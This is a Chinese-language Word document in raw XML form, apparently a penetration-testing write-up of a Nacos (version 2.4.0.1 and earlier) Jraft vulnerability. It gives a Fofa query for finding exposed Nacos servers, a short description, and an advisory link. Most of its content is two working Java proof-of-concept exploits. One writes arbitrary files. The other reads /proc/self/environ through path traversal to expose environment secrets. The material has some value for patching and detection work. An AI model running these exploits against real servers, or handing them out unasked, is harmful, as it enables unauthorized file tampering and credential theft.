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516389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Fofa语法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D3EAC8"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title="Nacos"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A33F6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漏洞说明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14551C5F"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在Nacos&lt;=2.4.0.1版本中集群模式启动下存在名为naming_persistent_service的Group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36565E5B"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该Group所使用的Processor为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28016F1B"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com.alibaba.nacos.naming.consistency.persistent.impl.PersistentServiceProcessor类型Processor，在进行处理过程中会触发其父类onApply或onRequest方法,这两个方法会分别造成任意文件写入删除和任意文件读取</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDC018F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F001D9B"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官方社区公告：https://nacos.io/blog/announcement-nacos-security-problem-file/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6B7CED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C58B1FC"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漏洞出现在Jraft服务（默认值7848）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196723C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漏洞POC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273F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0568D3"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任意文件写入</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C3ADB3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static void send(String addr, byte[] payload) throws Exception {  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BC78F2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Configuration conf = new Configuration();  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="646ABB3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conf.parse(addr);  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29FC6F4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RouteTable.getInstance().updateConfiguration("nacos", conf);  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A78085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CliClientServiceImpl cliClientService = new CliClientServiceImpl();  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28DAF8B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cliClientService.init(new CliOptions());  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0071653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RouteTable.getInstance().refreshLeader(cliClientService, "nacos", 1000).isOk();  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A49172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PeerId leader = PeerId.parsePeer(addr);  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FB8226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Field parserClasses = cliClientService.getRpcClient().getClass().getDeclaredField("parserClasses");  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FEB355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parserClasses.setAccessible(true);  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15CC78E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ConcurrentHashMap map = (ConcurrentHashMap) parserClasses.get(cliClientService.getRpcClient());  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7ED8F9B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map.put("com.alibaba.nacos.consistency.entity.WriteRequest", WriteRequest.getDefaultInstance());  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AF938E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MarshallerHelper.registerRespInstance(WriteRequest.class.getName(), WriteRequest.getDefaultInstance());  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30CF382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final WriteRequest writeRequest = WriteRequest.newBuilder().setGroup("naming_persistent_service").setData(ByteString.copyFrom(payload)).setOperation("Write").build();  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30B72A0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Object o = cliClientService.getRpcClient().invokeSync(leader.getEndpoint(), writeRequest, 5000);  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A7DEDE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System.out.println(o);  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="526019D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}  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="517F4A66">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="27EB118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static void main(String[] args) throws Exception {  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="750B58B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String address = "192.168.3.153:7848";  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42472B5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BatchWriteRequest request = new BatchWriteRequest();  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2522B2F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request.append("1.txt".getBytes(), "aaaa\n".getBytes());//向/home/nacos/data/naming/data/1.txt写入aaaa  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11BD0ED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JacksonSerializer serializer = new JacksonSerializer();  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B905D4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send(address, serializer.serialize(request));   </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FFA0A83"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 w14:paraId="57C5BBE8"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 w14:paraId="64C62579"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任意文件读取</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="627001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public static void send2(String addr, byte[] payload) throws Exception {  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="235A3E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Configuration conf = new Configuration();  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="217A16C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conf.parse(addr);  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66C056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RouteTable.getInstance().updateConfiguration("nacos", conf);  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BD2E9F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CliClientServiceImpl cliClientService = new CliClientServiceImpl();  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="218637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cliClientService.init(new CliOptions());  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FE02C9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RouteTable.getInstance().refreshLeader(cliClientService, "nacos", 1000).isOk();  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7967E1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PeerId leader = PeerId.parsePeer(addr);  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07DFE0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Field parserClasses = cliClientService.getRpcClient().getClass().getDeclaredField("parserClasses");  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="151439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parserClasses.setAccessible(true);  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="377806E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ConcurrentHashMap map = (ConcurrentHashMap) parserClasses.get(cliClientService.getRpcClient());  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05BFD6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map.put("com.alibaba.nacos.consistency.entity.ReadRequest", ReadRequest.getDefaultInstance());  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CD9D07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MarshallerHelper.registerRespInstance(ReadRequest.class.getName(), ReadRequest.getDefaultInstance());  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="041B233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final ReadRequest readRequest = ReadRequest.newBuilder().setGroup("naming_persistent_service").setData(ByteString.copyFrom(payload)).build();  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D5806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Object o = cliClientService.getRpcClient().invokeSync(leader.getEndpoint(), readRequest, 5000);  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="724983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System.out.println(o);  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A5A082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}  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="216DE8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public static void main(String[] args) throws Exception {  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27ACB4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bypass();  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="088832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String address = "192.168.3.153:7848";  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="689F8B0E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51BFC4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JacksonSerializer serializer = new JacksonSerializer();  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="033AAE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List byteArrayList = Arrays.asList("../../../../../../proc/self/environ".getBytes());  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A1211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send2(address, serializer.serialize(byteArrayList));  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B005F99">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="354B8B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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FE99332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666115"/>
                  <wp:effectExtent l="0" t="0" r="1143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F2DF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响应代码特征</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C5001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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44458A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响应内容特征</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7C626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 w14:paraId="13E8145F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67ABAB0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0ZmIwYTQ3NzlmZGUxZmU3Zjk0M2IyZTNmM2IxNjAifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="05703E0C"/>
    <w:rsid w:val="08FE3527"/>
    <w:rsid w:val="09F70386"/>
    <w:rsid w:val="0C43427C"/>
    <w:rsid w:val="0DD57ECE"/>
    <w:rsid w:val="0FD8668D"/>
    <w:rsid w:val="11230F50"/>
    <w:rsid w:val="1DB02E9D"/>
    <w:rsid w:val="1F071EB1"/>
    <w:rsid w:val="2697382D"/>
    <w:rsid w:val="329D53F1"/>
    <w:rsid w:val="337E1C21"/>
    <w:rsid w:val="35847FBF"/>
    <w:rsid w:val="35F37CF6"/>
    <w:rsid w:val="3F1F6A57"/>
    <w:rsid w:val="414B67C3"/>
    <w:rsid w:val="457A65DB"/>
    <w:rsid w:val="460D3116"/>
    <w:rsid w:val="48AC672A"/>
    <w:rsid w:val="49794E63"/>
    <w:rsid w:val="49D57BDD"/>
    <w:rsid w:val="4DF530F4"/>
    <w:rsid w:val="51ED257E"/>
    <w:rsid w:val="54C520EF"/>
    <w:rsid w:val="59F37B5D"/>
    <w:rsid w:val="63496EF9"/>
    <w:rsid w:val="63DD10CA"/>
    <w:rsid w:val="69CE5072"/>
    <w:rsid w:val="6B95409A"/>
    <w:rsid w:val="6BB83C0D"/>
    <w:rsid w:val="6BF66428"/>
    <w:rsid w:val="71FC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</Words>
  <Characters>374</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>8</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>398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2024-08-21T02:31:00Z</dcterms:created>
  <dc:creator>公众号-渗透安全HackTwo</dc:creator>
  <cp:lastModifiedBy>xiaolei</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-30T14:46:18Z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CD0C0E14F9644A4CBCBD15C06CDA2769_12</vt:lpwstr>
  </property>
</Properties>
</file>